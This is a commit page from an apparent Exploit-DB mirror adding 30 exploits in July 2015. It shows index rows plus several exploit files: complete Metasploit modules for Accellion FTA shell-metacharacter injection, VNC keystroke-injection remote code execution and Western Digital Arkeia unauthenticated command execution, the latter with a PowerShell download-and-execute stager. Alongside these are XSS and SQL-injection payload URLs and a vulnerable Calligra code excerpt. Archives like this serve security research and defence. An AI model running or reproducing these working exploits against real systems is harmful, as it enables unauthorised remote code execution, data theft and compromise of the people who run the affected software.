bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-07-14

Browse source 
30 new exploits
This commit is contained in:
Offensive Security 2015-07-14 05:03:24 +00:00
parent de22c9ec44
commit 5d9a8808ca
31 changed files with 2315 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

30
files.csv
View file

@ -33913,3 +33913,33 @@ id,file,description,date,author,platform,type,port
37571,platforms/multiple/webapps/37571.txt,"Zenoss <= 3.2.1 Multiple Security Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0
37572,platforms/php/webapps/37572.txt,"Elefant CMS 'id' Parameter Cross Site Scripting Vulnerability",2012-08-03,PuN!Sh3r,php,webapps,0
37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0
37575,platforms/php/webapps/37575.txt,"Joomla! 'com_photo' module Multiple SQL Injection Vulnerabilities",2012-08-06,"Chokri Ben Achor",php,webapps,0
37576,platforms/linux/remote/37576.cpp,"Alligra Calligra Heap Based Buffer Overflow Vulnerability",2012-08-07,"Charlie Miller",linux,remote,0
37577,platforms/asp/webapps/37577.txt,"PolarisCMS 'WebForm_OnSubmit()' Function Cross Site Scripting Vulnerability",2012-08-05,"Gjoko Krstic",asp,webapps,0
37578,platforms/php/webapps/37578.txt,"Open Constructor users/users.php keyword Parameter XSS",2012-08-04,"Lorenzo Cantoni",php,webapps,0
37579,platforms/php/webapps/37579.txt,"Open Constructor data/file/edit.php result Parameter XSS",2012-08-04,"Lorenzo Cantoni",php,webapps,0
37580,platforms/php/webapps/37580.txt,"Open Constructor confirm.php q Parameter XSS",2012-08-04,"Lorenzo Cantoni",php,webapps,0
37581,platforms/php/webapps/37581.txt,"Dir2web system/src/dispatcher.php oid Parameter SQL Injection",2012-08-07,"Daniel Correa",php,webapps,0
37582,platforms/php/webapps/37582.py,"Mibew Messenger 1.6.4 'threadid' Parameter SQL Injection Vulnerability",2012-08-05,"Ucha Gobejishvili",php,webapps,0
37583,platforms/php/webapps/37583.txt,"YT-Videos Script 'id' Parameter SQL Injection Vulnerability",2012-08-06,3spi0n,php,webapps,0
37584,platforms/php/webapps/37584.txt,"TCExam 11.2.x /admin/code/tce_edit_answer.php Multiple Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0
37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0
37586,platforms/php/webapps/37586.php,"PBBoard Authentication Bypass Vulnerability",2012-08-07,i-Hmx,php,webapps,0
37587,platforms/php/webapps/37587.txt,"GetSimple 'path' Parameter Local File Include Vulnerability",2012-08-07,PuN!Sh3r,php,webapps,0
37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,"John Page",php,webapps,80
37589,platforms/java/webapps/37589.txt,"ConcourseSuite Multiple Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0
37590,platforms/php/webapps/37590.txt,"PHPList 2.10.18 'unconfirmed' Parameter Cross-Site Scripting Vulnerability",2012-08-08,"High-Tech Bridge SA",php,webapps,0
37591,platforms/php/webapps/37591.php,"AraDown 'id' Parameter SQL Injection Vulnerability",2012-08-08,G-B,php,webapps,0
37592,platforms/php/webapps/37592.php,"FreiChat 9.6 - SQL Injection",2015-07-13,"Kacper Szurek",php,webapps,80
37593,platforms/windows/dos/37593.py,"Full Player 8.2.1 - Memory Corruption PoC",2015-07-13,"SATHISH ARTHAR",windows,dos,0
37594,platforms/php/webapps/37594.txt,"Arab Portal 3 - SQL Injection Vulnerability",2015-07-13,"ali ahmady",php,webapps,80
37595,platforms/php/webapps/37595.txt,"phpVibe - Aribtrary File Disclosure",2015-07-13,"ali ahmady",php,webapps,80
37596,platforms/php/webapps/37596.txt,"ArticleFR 3.0.6 - Multiple Vulnerabilities",2015-07-13,LiquidWorm,php,webapps,80
37597,platforms/hardware/remote/37597.rb,"Accellion FTA getStatus verify_oauth_token Command Execution",2015-07-13,metasploit,hardware,remote,443
37598,platforms/multiple/remote/37598.rb,"VNC Keyboard Remote Code Execution",2015-07-13,metasploit,multiple,remote,5900
37599,platforms/windows/remote/37599.rb,"Adobe Flash opaqueBackground Use After Free",2015-07-13,metasploit,windows,remote,0
37600,platforms/multiple/remote/37600.rb,"Western Digital Arkeia Remote Code Execution",2015-07-13,metasploit,multiple,remote,617
37601,platforms/php/webapps/37601.txt,"WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download",2015-07-13,"Larry W. Cashdollar",php,webapps,80
37602,platforms/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",php,webapps,80
37603,platforms/php/webapps/37603.txt,"WordPress CP Contact Form with Paypal Plugin 1.1.5 - Multiple Vulnerabilities",2015-07-13,"Nitin Venkatesh",php,webapps,80
37604,platforms/php/webapps/37604.txt,"SO Planning 1.32 - Multiple Vulnerabilities",2015-07-13,"Huy-Ngoc DAU",php,webapps,80

Can't render this file because it is too large.

8
platforms/asp/webapps/37577.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/54817/info
PolarisCMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/reselleradmin/blog.aspx?%27%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
http://www.example.com/reselleradmin/blog.aspx?%27onmouseover=prompt(101)%3E

125
platforms/hardware/remote/37597.rb Executable file
View file

@ -0,0 +1,125 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Accellion FTA getStatus verify_oauth_token Command Execution',
'Description' => %q{
This module exploits a metacharacter shell injection vulnerability in the Accellion
File Transfer appliance. This vulnerability is triggered when a user-provided
'oauth_token' is passed into a system() call within a mod_perl handler. This
module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include
'/seos/find.api', '/seos/put.api', and /seos/mput.api'. This issue was confirmed on
version FTA_9_11_200, but may apply to previous versions as well. This issue was
fixed in software update FTA_9_11_210.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://r-7.co/R7-2015-08'],
['CVE', '2015-2857']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet',
}
},
'Targets' =>
[
[ 'Automatic', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 10 2015'
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true])
], self.class)
end
def check
uri = '/tws/getStatus'
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'transaction_id' => rand(0x100000000),
'oauth_token' => 'invalid'
}})
unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"MD5 token is invalid"/
return Exploit::CheckCode::Safe
end
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'transaction_id' => rand(0x100000000),
'oauth_token' => "';echo '"
}})
unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/
return Exploit::CheckCode::Safe
end
Msf::Exploit::CheckCode::Vulnerable
end
def exploit
# The token is embedded into a command line the following:
# `/opt/bin/perl /home/seos/system/call_webservice.pl $aid oauth_ws.php verify_access_token '$token' '$scope'`;
token = "';#{payload.encoded};echo '"
uri = '/tws/getStatus'
# Other exploitable URLs:
# * /seos/find.api (works with no other changes to this module)
# * /seos/put.api (requires some hoop jumping, upload)
# * /seos/mput.api (requires some hoop jumping, token && upload)
print_status("Sending request for #{uri}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'transaction_id' => rand(0x100000000),
'oauth_token' => token
}})
if res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/
print_status("Valid response received...")
else
if res
print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}")
else
print_error("No reply received from the target")
end
end
handler
end
end

12
platforms/java/webapps/37589.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/54881/info
The ConcourseSuite is prone to a cross-site request-forgery vulnerability and multiple cross-site scripting vulnerabilities.
An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete, or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
ConcourseSuite version 6.1 (20120209) is vulnerable; other versions may also be affected.
http://www.example.com/crm/Sales.do?nameFirst&nameLast
http://www.example.com/crm/ExternalContacts.do?nameFirst&nameLast&company
http://www.example.com/crm/Accounts.do?name
http://www.example.com/crm/MyCFSProfile.do?address1state

21
platforms/linux/remote/37576.cpp Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/54816/info
Calligra is prone to a remote buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Calligra 2.4.3 and KOffice 2.3.3 are vulnerable; other versions may also be affected.
bool STD::read( U16 baseSize, U16 totalSize, OLEStreamReader* stream, bool
preservePos )
...
grupxLen = totalSize - ( stream->tell() - startOffset );
grupx = new U8[ grupxLen ];
int offset = 0;
for ( U8 i = 0; i < cupx; ++i) {
U16 cbUPX = stream->readU16(); // size of the next UPX
stream->seek( -2, G_SEEK_CUR ); // rewind the "lookahead"
cbUPX += 2; // ...and correct the size
for ( U16 j = 0; j < cbUPX; ++j ) {
grupx[ offset + j ] = stream->readU8(); // read the whole UPX
}

186
platforms/multiple/remote/37598.rb Executable file
View file

@ -0,0 +1,186 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/proto/rfb'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
WINDOWS_KEY = "\xff\xeb"
ENTER_KEY = "\xff\x0d"
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'VNC Keyboard Remote Code Execution',
'Description' => %q{
This module exploits VNC servers by sending virtual keyboard keys and executing
a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager
payload is typed and executed. On Unix/Linux systems a xterm terminal is opened
and a payload is typed and executed.
},
'Author' => [ 'xistence <xistence[at]0x90.nl>' ],
'Privileged' => false,
'License' => MSF_LICENSE,
'Platform' => %w{ win unix },
'Targets' =>
[
[ 'VNC Windows / Powershell', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],
[ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ],
[ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
],
'References' =>
[
[ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/']
],
'DisclosureDate' => 'Jul 10 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(5900),
OptString.new('PASSWORD', [ false, 'The VNC password']),
OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
], self.class)
end
def press_key(key)
keyboard_key = "\x04\x01" # Press key
keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
keyboard_key << key # The keyboard key
# Press the keyboard key. Note: No receive is done as everything is sent in one long data stream
sock.put(keyboard_key)
end
def release_key(key)
keyboard_key = "\x04\x00" # Release key
keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
keyboard_key << key # The keyboard key
# Release the keyboard key. Note: No receive is done as everything is sent in one long data stream
sock.put(keyboard_key)
end
def exec_command(command)
values = command.chars.to_a
values.each do |value|
press_key("\x00#{value}")
release_key("\x00#{value}")
end
press_key(ENTER_KEY)
end
def start_cmd_prompt
print_status("#{rhost}:#{rport} - Opening Run command")
# Pressing and holding windows key for 1 second
press_key(WINDOWS_KEY)
Rex.select(nil, nil, nil, 1)
# Press the "r" key
press_key("\x00r")
# Now we can release both keys again
release_key("\x00r")
release_key(WINDOWS_KEY)
# Wait a second to open run command window
select(nil, nil, nil, 1)
exec_command('cmd.exe')
# Wait a second for cmd.exe prompt to open
Rex.select(nil, nil, nil, 1)
end
def exploit
begin
alt_key = "\xff\xe9"
f2_key = "\xff\xbf"
password = datastore['PASSWORD']
connect
vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)
unless vnc.handshake
fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC Handshake failed: #{vnc.error}")
end
if password.nil?
print_status("#{rhost}:#{rport} - Bypass authentication")
# The following byte is sent in case the VNC server end doesn't require authentication (empty password)
sock.put("\x10")
else
print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")
if vnc.authenticate(password)
print_status("#{rhost}:#{rport} - Authenticated")
else
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}")
end
end
# Send shared desktop
unless vnc.send_client_init
fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC client init failed: #{vnc.error}")
end
if target.name =~ /VBScript CMDStager/
start_cmd_prompt
print_status("#{rhost}:#{rport} - Typing and executing payload")
execute_cmdstager({:flavor => :vbs, :linemax => 8100})
# Exit the CMD prompt
exec_command('exit')
elsif target.name =~ /Powershell/
start_cmd_prompt
print_status("#{rhost}:#{rport} - Typing and executing payload")
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true})
# Execute powershell payload and make sure we exit our CMD prompt
exec_command("#{command} && exit")
elsif target.name =~ /Linux/
print_status("#{rhost}:#{rport} - Opening 'Run Application'")
# Press the ALT key and hold it for a second
press_key(alt_key)
Rex.select(nil, nil, nil, 1)
# Press F2 to start up "Run application"
press_key(f2_key)
# Release ALT + F2
release_key(alt_key)
release_key(f2_key)
# Wait a second for "Run application" to start
Rex.select(nil, nil, nil, 1)
# Start a xterm window
print_status("#{rhost}:#{rport} - Opening xterm")
exec_command('xterm')
# Wait a second for "xterm" to start
Rex.select(nil, nil, nil, 1)
# Execute our payload and exit (close) the xterm window
print_status("#{rhost}:#{rport} - Typing and executing payload")
exec_command("nohup #{payload.encoded} &")
exec_command('exit')
end
print_status("#{rhost}:#{rport} - Waiting for session...")
(datastore['TIME_WAIT']).times do
Rex.sleep(1)
# Success! session is here!
break if session_created?
end
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
ensure
disconnect
end
end
def execute_command(cmd, opts = {})
exec_command(cmd)
end
end

555
platforms/multiple/remote/37600.rb Executable file
View file

@ -0,0 +1,555 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Western Digital Arkeia Remote Code Execution',
'Description' => %q{
This module exploits a code execution flaw in Western Digital Arkeia version 11.0.12 and below.
The vulnerability exists in the 'arkeiad' daemon listening on TCP port 617. Because there are
insufficient checks on the authentication of all clients, this can be bypassed.
Using the ARKFS_EXEC_CMD operation it's possible to execute arbitrary commands with root or
SYSTEM privileges.
The daemon is installed on both the Arkeia server as well on all the backup clients. The module
has been successfully tested on Windows, Linux, OSX, FreeBSD and OpenBSD.
},
'Author' =>
[
'xistence <xistence[at]0x90.nl>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win',
}
],
[ 'Linux',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' =>
{
'DisableNops' => true,
'Space' => 60000,
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'perl python bash-tcp gawk openssl'
}
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 10 2015'))
register_options(
[
Opt::RPORT(617),
OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15])
], self.class)
end
def check
connect
req = "\x00\x41"
req << "\x00" * 5
req << "\x73"
req << "\x00" * 12
req << "\xc0\xa8\x02\x74"
req << "\x00" * 56
req << "\x74\x02\xa8\xc0"
req << 'ARKADMIN'
req << "\x00"
req << 'root'
req << "\x00"
req << 'root'
req << "\x00" * 3
req << '4.3.0-1' # version?
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end
req = "\x00\x73"
req << "\x00" * 5
req << "\x0c\x32"
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end
req = "\x00\x61\x00\x04\x00\x01\x00\x11\x00\x00\x31\x00"
req << 'EN' # Language
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
unless data_length == 0
disconnect
return Exploit::CheckCode::Unknown
end
# ARKADMIN_GET_CLIENT_INFO
req = "\x00\x62\x00\x01"
req << "\x00" * 3
req << "\x26"
req << 'ARKADMIN_GET_CLIENT_INFO' # Function to request agent information
req << "\x00\x32\x38"
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
unless data_length == 0
disconnect
return Exploit::CheckCode::Unknown
end
req = "\x00\x63\x00\x04\x00\x00\x00\x12\x30\x00\x31\x00\x32\x38"
req << "\x00" * 12
sock.put(req)
# 1st packet
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x63\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end
# 2nd packet
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end
# 3rd packet
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x65\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length && data.include?('You have successfully retrieved client information')
disconnect
return Exploit::CheckCode::Unknown
end
# 4th packet
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x69\x00\x04"
disconnect
return Exploit::CheckCode::Unknown
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
return Exploit::CheckCode::Unknown
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
return Exploit::CheckCode::Unknown
end
if data =~ /VERSION.*WD Arkeia ([0-9]+\.[0-9]+\.[0-9]+)/
version = $1
vprint_status("#{rhost}:#{rport} - Arkeia version detected: #{version}")
if Gem::Version.new(version) <= Gem::Version.new('11.0.12')
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
else
vprint_status("#{rhost}:#{rport} - Arkeia version not detected")
return Exploit::CheckCode::Unknown
end
end
def exploit
if target.name =~ /Windows/
@down_file = rand_text_alpha(8+rand(8))
@pl = generate_payload_exe
begin
Timeout.timeout(datastore['HTTP_DELAY']) {super}
rescue Timeout::Error
end
elsif target.name =~ /Linux/
communicate(payload.encoded)
return
end
end
def primer
@payload_url = get_uri
# PowerShell web download. The char replacement is needed because using the "/" character twice (like http://)
# is not possible on Windows agents.
command = "PowerShell -Command \"$s=[CHAR][BYTE]47;$b=\\\"#{@payload_url.gsub(/\//, '$($s)')}\\\";"
command << "(New-Object System.Net.WebClient).DownloadFile($b,'c:/#{@down_file}.exe');"
command << "(New-Object -com Shell.Application).ShellExecute('c:/#{@down_file}.exe');\""
communicate(command)
end
def communicate(command)
print_status("#{rhost}:#{rport} - Connecting to Arkeia daemon")
connect
print_status("#{rhost}:#{rport} - Sending agent communication")
req = "\x00\x41\x00\x00\x00\x00\x00\x70"
req << "\x00" * 12
req << "\xc0\xa8\x02\x8a"
req << "\x00" * 56
req << "\x8a\x02\xa8\xc0"
req << 'ARKFS'
req << "\x00"
req << 'root'
req << "\x00"
req << 'root'
req << "\x00" * 3
req << '4.3.0-1' # Client version ?
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end
req = "\x00\x73\x00\x00\x00\x00\x00\x0c\x32"
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x60\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end
req = "\x00\x61\x00\x04\x00\x01\x00\x1a\x00\x00"
req << rand_text_numeric(10) # "1234567890" - 10 byte numerical value, like a session ID?
req << "\x00"
req << 'EN' # English language?
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end
data_length = data_length.unpack('n')[0]
unless data_length == 0
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read")
end
req = "\x00\x62\x00\x01\x00\x02\x00\x1b"
req << 'ARKFS_EXEC_CMD' # With this function we can execute system commands with root/SYSTEM privileges
req << "\x00\x31"
req << "\x00" * 11
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x43\x00\x00"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end
data_length = data_length.unpack('n')[0]
unless data_length == 0
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unexpected length read")
end
req = "\x00\x63\x00\x04\x00\x03\x00\x15\x31\x00\x31\x00\x31\x00\x30\x3a\x31\x2c"
req << "\x00" * 11
sock.put(req)
command_length = '%02x' % command.length
command_length = command_length.scan(/../).map { |x| x.hex.chr }.join
req = "\x00\x64\x00\x04\x00\x04"
req << [command.length].pack('n')
req << command # Our command to be executed
req << "\x00"
print_status("#{rhost}:#{rport} - Executing payload through ARKFS_EXEC_CMD")
sock.put(req)
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x63\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end
# 1st Packet
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end
# 2st Packet
header = sock.get_once(6)
unless header && header.length == 6 && header[0, 4] == "\x00\x68\x00\x04"
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet identifier")
end
data_length = sock.get_once(2)
unless data_length && data_length.length == 2
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet length")
end
data_length = data_length.unpack('n')[0]
data = sock.get_once(data_length)
unless data && data.length == data_length
disconnect
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
end
end
def on_request_uri(cli, request)
print_status("Request: #{request.uri}")
if request.uri == get_resource
print_status('Sending payload...')
send_response(cli, @pl)
register_files_for_cleanup("c:\\#{@down_file}.exe")
end
end
end

10
platforms/php/webapps/37575.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/54814/info
The 'com_photo' module for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com.np/index.php?option=com_photo&task=gallery&AlbumId=8[SQL Injection]
http://www.example.com/index.php?option=com_photo&action=slideview&key=16[SQL Injection]

9
platforms/php/webapps/37578.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54822/info
Open Constructor is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Open Constructor 3.12.0 is vulnerable; other versions may also be affected.
http://www.example.com/openconstructor/users/users.php?type=multiple&keyword=<script>alert('xss')</script>

9
platforms/php/webapps/37579.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54822/info
Open Constructor is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Open Constructor 3.12.0 is vulnerable; other versions may also be affected.
http://www.example.com/openconstructor/data/file/edit.php?result=<script>aler('xss')</script>&id=new&ds_id=8&hybridid=&fieldid=&callback=&type=txt&name=test&description=test&fname=test&create=Save

9
platforms/php/webapps/37580.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54822/info
Open Constructor is prone to multiple input-validation vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Open Constructor 3.12.0 is vulnerable; other versions may also be affected.
http://www.example.com/openconstructor/confirm.php?q=<script>alert('XSS')</script>skin=metallic

9
platforms/php/webapps/37581.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/54845/info
